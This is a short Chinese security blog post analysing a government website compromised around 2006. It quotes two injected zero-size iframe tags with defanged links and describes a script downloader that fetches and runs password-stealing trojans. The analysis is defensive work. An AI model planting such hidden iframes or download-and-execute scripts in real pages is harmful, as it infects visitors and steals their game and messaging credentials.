一个会下载 Trojan.DL.Agent.wzr 的政府网站

原创

PurpleEndurer 2022-12-07 11:43:04 博主文章分类：系统安全 ©著作权

文章标签 vbscript borland iframe delphi javascript 文章分类 运维

©著作权归作者所有：来自51CTO博客作者PurpleEndurer的原创作品，请联系作者获取转载授权，否则将追究法律责任

endurer 原创

2006-10-25 第1版

网页首部被两次加入代码：
/---------
＜iframe height＝0 width＝0 src＝"hxxp://ip-i*e.www***113.cnidc.cn/wm**/"＞＜/iframe＞
----------/

wm**.htm （Kaspersky 报为 Trojan-Downloader.VBS.Psyme.cy）的内容为 escape( ) 加密的代码，解密后的内容为一段 JavaScript 编写的脚本程序，在这之前遇到的此类脚本代码都是用 VBScript编写的，不过都利用 Microsoft.XMLHTTP、Adodb.Stream 下载 1.exe，保存为 c:/boot.exe，通过Shell.Application 的 ShellExecute方法运行。

1.exe 采用 Borland Delphi开发，文件长度为 15.5 KB (15,872 字节)，Kaspersky 报为 Trojan-Downloader.Win32.Small.dwu，瑞星报为 Trojan.DL.Agent.wzr。

1.exe会从同一网站下载文件：
1）wow.exe（瑞星报为 Trojan.PSW.WoWar.lr）
2）qq.exe（使用的是JPG图片图标，Kaspersky 报为 Trojan-PSW.Win32.QQRob.iw，瑞星报为 Trojan.PSW.QQRobber.ajv）

从另一网站下载文件：
1）1234.exe（Kaspersky 报为 Trojan-PSW.Win32.WOW.le，瑞星报为 Trojan.PSW.Element.c）
2）4321.exe

网页末尾还有代码：

/---------
＜iframe src＝"hxxp://bbs.geme***us.com/m1*3/index*.htm"width＝"0" height＝"0"＞＜/iframe＞
---------/

似已失效。